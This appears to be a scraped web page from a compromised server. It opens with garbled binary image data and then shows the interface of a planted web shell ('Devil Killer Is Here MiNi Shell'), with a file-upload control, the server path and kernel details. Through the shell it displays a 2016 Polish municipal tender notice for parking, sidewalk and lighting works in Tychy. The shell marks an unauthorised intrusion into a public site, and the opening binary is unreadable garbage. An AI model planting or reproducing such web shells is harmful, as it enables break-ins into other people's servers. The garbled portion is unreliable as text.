JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/88260-N-2016.html

<p class="kh_header"><b>Tychy: Opracowanie projektu z wykonaniem  zaprojektowanych prac dla zadania inwestycyjnego pn.:  
     ZAGOSPODAROWANIE TERENU Z BUDOWĄ MIEJSC PARKINGOWYCH, WYKONANIEM 
        CHODNIKÓW I OŚWIETLENIA TERENU PRZY UL. EDUKACJI 1-5 i UL. BAZIOWEJ 1-3 
        ORAZ BAZIOWEJ 17-19 - PRZEDEPT POMIĘDZY AL. BIELSKĄ I UL. BAZIOWĄ</b><br>
<b>Numer ogłoszenia: 88260 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu z wykonaniem  zaprojektowanych prac dla zadania inwestycyjnego pn.:  
     ZAGOSPODAROWANIE TERENU Z BUDOWĄ MIEJSC PARKINGOWYCH, WYKONANIEM 
        CHODNIKÓW I OŚWIETLENIA TERENU PRZY UL. EDUKACJI 1-5 i UL. BAZIOWEJ 1-3 
        ORAZ BAZIOWEJ 17-19 - PRZEDEPT POMIĘDZY AL. BIELSKĄ I UL. BAZIOWĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie projektu z wykonaniem zaprojektowanych prac dla 
    zadania inwestycyjnego pn.: Zagospodarowanie terenu z budową miejsc parkingowych, 
    wykonaniem chodników i oświetlenia terenu przy ul. Edukacji 1-5 i ul. Baziowej 1-3 oraz 
    Baziowej 17-19 -  przedept pomiędzy al. Bielską i ul. Baziową
      Zamówienie składa się z dwóch zadań:
      ZADANIE NR 1	
      Opracowanie projektu z wykonaniem zaprojektowanych prac pn.: 
      Zagospodarowanie terenu z budową miejsc parkingowych, wykonaniem chodników 
      oraz oświetlenia przy ul. Edukacji 1-5 i ul. Baziowej 1-3 

      Szczegółowy opis przedmiotu zamówienia  dotyczący zadania nr 1 zawiera Program 
      Funkcjonalno-Użytkowy stanowiący załącznik nr 1 do wzoru Umowy.
      
     ZADANIE NR 2	
     Opracowanie projektu z wykonaniem zaprojektowanych prac pn.:  Wykonanie chodników 
     wraz z oświetleniem w rejonie ul. Baziowej 17-19 - przedept pomiędzy al. Bielską
     i ul. Baziową.

     Szczegółowy opis przedmiotu zamówienia  dotyczący zadania nr 2 zawiera Program 
     Funkcjonalno-Użytkowy stanowiący załącznik nr 1A do wzoru Umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
           ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach 
           określonych w art. 67 ust.1 pkt 6 ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.91-4, 45.11.10.00-8, 45.23.24.51-8, 45.23.32.00-1, 45.31.12.00-2, 71.22.00.00-6, 71.40.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:                              
12 000,00 zł (słownie: dwanaście tysięcy złotych zero groszy) - na czas związania ofertą. 
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
                                 Bank Pekao S.A.
                                 Nr rachunku bankowego: 86 1240 2975 1111 0010 6583 2252
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia  wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania spełniania warunku udziału w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy PZP), Zamawiający wymaga złożenia następujących dokumentów:
3)	1)    wykaz usług projektowych wykonanych w okresie ostatnich trzech lat przed upływem
4)	       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
5)	       wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały one wykonane należycie.

                                                         Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał:
 życie:                                        a)  co najmniej jedną usługę obejmującą swym zakresem opracowanie projektu 
                                                         zagospodarowania terenu,
	
:                                                  b)  co najmniej jedną usługę obejmującą swym zakresem opracowanie dokumentacji 
                                                         projektowej na budowę chodników / parkingów o nawierzchni  z kostki brukowej
                                                         
	     
2)	wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem  
       terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
       wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów 
       dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób 

        należyty oraz wskazujących , czy zostały wykonane z zasadami sztuki budowlanej                               
        i prawidłowo ukończone:
       -    należy wykazać wykonanie co najmniej dwóch robót budowlanych polegających 
        na budowie lub przebudowie układu drogowego lub parkingu , prawidłowo wykonanych 
        i zakończonych, w technologii kostki betonowej na wartość min. 500 000,00 zł (brutto)/ - 
        każda. Każda z w/w robót powinna obejmować swym zakresem budowę odwodnienia 
        i oświetlenie.
           
1.2.1	 Do wykazu należy dołączyć dowody dotyczące najważniejszych usług i robót 
             budowlanych określające, czy usługi te zostały wykonane w sposób należyty oraz czy 
             roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania 
           odpowiednim potencjałem technicznym do wykonania zamówienia (art. 22 ust. 1 pkt 3 
           ustawy - PZP) Zamawiający wymaga złożenia następujących dokumentów:
1)	   wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy 
      robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie  
       dysponowania tymi zasobami.
            Wymagane jest dysponowanie co najmniej:
a)	  koparka  -  1szt.
b)	  walec statyczny samojezdny - 1 szt. 
c)	  wibrator powierzchniowy - 1 szt.
d)	  zagęszczarka wibracyjna -  1 szt.
e)	  samochód samowyładowczy do 5 ton - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący dysponowania 
           osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy PZP) 
           Zamawiający żąda następujących dokumentów:
1)	    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności  
    odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami  
    budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  
    i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych  
    przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
    Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje       
    co najmniej:

a)	  jedną osobą posiadającą uprawnienia budowlane do projektowania (upoważniające do  
        sporządzania projektów zagospodarowania terenu) w specjalności architektonicznej 
        lub konstrukcyjno-budowlanej; 

b)	jedną osobą posiadającą uprawnienia budowlane do projektowania robót drogowych
         w specjalności drogowej lub odpowiednie;

c)	   jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności  
         instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
         i elektroenergetycznych;
       d)  jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
            w specjalności konstrukcyjno-budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  Wykonawca spełnia warunek udziału dotyczący posiadania 
           wymaganej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt  4 ustawy PZP), 
           Zamawiający wymaga, złożenia następujących dokumentów: 
1)	   opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że 
         Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
         działalności związanej z przedmiotem zamówienia.
          Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ww. 
          dokument o wartości ubezpieczenia nie mniejszej niż 500 000,00 zł (pięćset tysięcy złotych 
          zero groszy).
          Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia musi 
          wynikać z treści dokumentu polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom 
          określonym przez Zamawiającego, Zamawiający żąda następujących dokumentów:
               
    a)   zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań  
          Wykonawcy z normami jakościowymi - wymaga się od Wykonawcy posiadania 
          wdrożonego systemu zarządzania jakością.
          Wykonawca może zamiast ww. zaświadczenia złożyć równoważne zaświadczenie 
          wystawione przez podmiot mający siedzibę w innym państwie członkowskim 
          Europejskiego Obszaru Gospodarczego lub złożyć inne dokumenty potwierdzające 
          stosowanie przez wykonawców równoważnych środków zapewnienia jakości.
(W przypadku składania oferty przez podmioty występujące wspólnie dokument ten musi być złożony przez co najmniej jeden podmiot)

   b) zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań 
       Wykonawcy z europejskimi normami zarządzania środowiskiem, które Wykonawca będzie
       stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do 
       systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem 
       opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty 
       działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi 
       normami dotyczącymi certyfikacji - wymaga się od Wykonawcy posiadania wdrożonego 
       systemu zarządzania środowiskiem.	
       Wykonawca może zamiast ww. zaświadczenia złożyć równoważne zaświadczenie 
       wystawione przez podmiot mający siedzibę w innym państwie członkowskim Europejskiego 
       Obszaru Gospodarczego lub inne równoważne dokumenty potwierdzające stosowanie 
       przez wykonawców równoważnych środków zarządzania środowiskiem.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego 
  załącznik nr 1 do SIWZ.
2)	  wypełniony i podpisany formularz oferty cenowej - sporządzony według wzoru druku   
  stanowiącego załącznik nr 1a do SIWZ.
3)	  pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba  
  upoważniona do reprezentowania Wykonawcy z mocy prawa;
4)	   w przypadku Wykonawców wspólnie ubiegających się się o udzielenie zamówienia,  
   dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 
   zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego  
   zamówienia publicznego;
5) Zgodnie z art. 26 ust. 2b ustawy - PZP, Wykonawca może polegać na wiedzy 
             i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, 
             zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od 
             charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
             zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami  trakcie 
             realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne 
             zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów 
             na potrzeby wykonania zamówienia. Dokument, z którego będzie wynikać zobowiązanie 
             podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia 
             Wykonawcy ubiegającego się o zamówienie odpowiedniego zasobu oraz wskazywać:
       -  jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
       -  w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę przy 
           wykonywaniu zamówienia,
       -  jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem,
       -  jaki jest zakres w jakim okresie inny podmiot będzie brał udział przy wykonywaniu
           zamówienia.
    Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego, powinien być 
    podpisany wyłącznie przez osoby upoważnione na piśmie lub wpisane w odpowiednich    
    dokumentach rejestrowych w imieniu reprezentowanego podmiotu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
